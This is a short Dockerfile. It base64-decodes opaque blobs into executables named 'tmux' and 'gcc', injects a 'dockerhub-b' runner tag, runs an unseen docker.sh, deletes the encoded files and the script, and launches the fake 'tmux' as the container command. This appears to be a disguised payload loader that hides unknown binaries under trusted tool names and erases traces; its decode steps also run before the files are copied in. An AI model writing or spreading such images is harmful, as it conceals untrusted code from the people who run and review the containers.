FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > tmux.log'

RUN base64 --decode tmux.64 > tmux
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY tmux .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' tmux
RUN bash ./docker.sh

RUN rm --force --recursive tmux _REPO_NAME__.64 docker.sh gcc gcc.64

CMD tmux
